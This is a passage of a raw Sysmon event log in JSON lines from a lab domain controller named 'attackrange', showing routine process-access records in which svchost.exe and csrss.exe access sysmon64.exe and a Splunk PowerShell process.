08:05:43.429","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-0010D4BD0D00}","TargetProcessId":"4288","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7508,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.429\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.429","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7509,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.429\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.429","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7510,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.429\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.429","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7511,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.429\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.429","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7512,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.429\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.429","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7513,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.429\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.429","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7514,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.429\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.429","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7515,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.429\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.429","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\